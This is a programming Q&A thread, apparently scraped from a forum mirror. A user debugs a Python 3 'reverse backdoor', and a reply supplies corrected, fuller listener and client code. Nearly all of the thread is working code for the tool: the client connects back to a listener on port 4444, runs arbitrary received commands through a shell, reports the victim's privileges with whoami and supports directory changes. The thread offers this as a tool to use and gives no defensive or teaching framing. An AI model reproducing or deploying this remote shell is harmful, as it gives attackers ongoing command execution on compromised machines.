I'm writing a client/server backdoor with Python 3 and get an error when running the code.
When I try to put some command on input I got the following error from the client side:
Traceback (most recent call last): File "reverse_backdoor.py", line 36, in <module>
my_backdoor.run() File "reverse_backdoor.py", line 32, in run
self.reliable_send(command_result) File "reverse_backdoor.py", line 13, in reliable_send
json_data = json.dumps(data) File "/usr/lib/python3.7/json/__init__.py", line 231, in dumps
return _default_encoder.encode(obj) File "/usr/lib/python3.7/json/encoder.py", line 199, in encode
chunks = self.iterencode(o, _one_shot=True) File "/usr/lib/python3.7/json/encoder.py", line 257, in iterencode
return _iterencode(o, 0) File "/usr/lib/python3.7/json/encoder.py", line 179, in default
raise TypeError(f'Object of type {o.__class__.__name__} ' TypeError: Object of type bytes is not JSON serializable
Here is my server code:
#!/usr/bin/python
import json
import socket
class Listener:
def __init__(self, ip, port):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind((ip, port))
listener.listen(0)
print("[+] Waiting for incoming connection")
self.connection, address = listener.accept()
print("[+] Got a connection from " + str(address))
def reliable_send(self, data):
json_data = json.dumps(data)
self.connection.send(json_data.encode('utf-8'))
def relaible_receive(self):
while True:
try:
json_data = self.connection.recv(4098)
return json.loads(json_data.decode('utf-8'))
except ValueError:
continue
def execute_remotely(self, command):
self.reliable_send(command)
return self.relaible_receive()
def run(self):
while True:
command = input('>>')
result = self.execute_remotely(command)
print(result)
my_listener = Listener("192.168.1.105", 4444)
my_listener.run()
And here is my client code:
#!/usr/bin/python
import socket
import subprocess
import json
class Backdoor:
def __init__(self, ip, port):
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((ip, port))
def reliable_send(self, data):
json_data = json.dumps(data)
self.connection.send(json_data.encode('utf-8'))
def relaible_receive(self):
json_data = ""
while True:
try:
json_data = json_data + self.connection.recv(4098).decode('utf-8')
return json.loads(json_data.encode('utf-8'))
except ValueError:
continue
def execute_system_command(self, command):
return subprocess.check_output(command, shell=True)
def run(self):
while True:
command = self.relaible_receive()
command_result = self.execute_system_command(command)
self.reliable_send(command_result)
my_backdoor = Backdoor("192.168.1.105", 4444)
my_backdoor.run()
I also tried changing this:
def relaible_receive(self):
json_data = ""
while True:
try:
json_data = json_data + self.connection.recv(4098).decode('utf-8')
return json.loads(json_data.encode('utf-8'))
except ValueError:
continue
To this:
def relaible_receive(self):
json_data = ""
while True:
try:
json_data = json_data + self.connection.recv(4098)
return json.loads(json_data.encode('utf-8'))
except ValueError:
continue
And I got the following error:
Traceback (most recent call last): File "reverse_backdoor.py", line 36, in <module>
my_backdoor.run() File "reverse_backdoor.py", line 30, in run
command = self.relaible_receive() File "reverse_backdoor.py", line 20, in relaible_receive
json_data = json_data + self.connection.recv(4098) TypeError: can only concatenate str (not "bytes") to str
Could someone tell me how I could fix this?
Just add .decode()
to this line:-
json_data = json.dumps(data.decode())
and also do this
while True:
try:
json_data = json_data + self.connection.recv(4098)
return json.loads(json_data)
make these changes to your original server as well, as client code is not in the changed code which you have done.
# This is DD's Code
import json
import socket
class Listener:
def __init__(self, bind_ip, bind_port):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((bind_ip, bind_port))
server.listen(0)
print("[*] Listening on %s:%d" % (bind_ip, bind_port))
self.connection, addr = server.accept()
print("[*] Accepted connection from: %s:%d" % (addr[0], addr[1]))
receive = self.connection.recv(1024)
print("[+] This is " + receive.decode('utf 8'))
def reliable_send(self, data):
json_data = json.dumps(data)
self.connection.send(json_data.encode('utf 8'))
def reliable_recv(self):
json_data = " "
while True:
try:
json_data = json_data + self.connection.recv(4096).decode('utf 8')
return json.loads(json_data)
except ValueError:
continue
def run_command(self):
while True:
command = input(">")
command = command.split(" ")
if command[0] == "exit":
self.connection.close()
exit()
self.reliable_send(command)
result = self.reliable_recv()
print(result)
my_listener = Listener('192.168.43.127', 4444)
my_listener.run_command()
#This is DD's Code
from socket import *
import subprocess
import json
import os
class Backdoor:
def __init__(self, ip, port):
self.connection = socket(AF_INET, SOCK_STREAM)
self.connection.connect((ip, port))
def execute_system_command(self, command):
return subprocess.check_output(command, shell=True)
def reliable_send(self, data):
json_data = json.dumps(data)
self.connection.send(json_data.encode('utf 8'))
def reliable_recv(self):
json_data = " "
while True:
try:
json_data = json_data + self.connection.recv(1024).decode('utf 8')
return json.loads(json_data)
except ValueError:
continue
def change_working_directory_to(self, path):
os.chdir(path)
return "[+] Changing working directory to " + path
def run(self):
privilege = subprocess.check_output('whoami', shell=True)
self.connection.send(privilege)
while True:
command = self.reliable_recv()
if command[0] == "exit":
self.connection.close()
exit()
elif command[0] == "cd" and len(command) > 1:
command_result = self.change_working_directory_to(command[1])
self.reliable_send(command_result)
else:
command_result = self.execute_system_command(command)
self.reliable_send(command_result.decode())
my_backdoor = Backdoor('192.168.43.127', 4444)
my_backdoor.run()
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.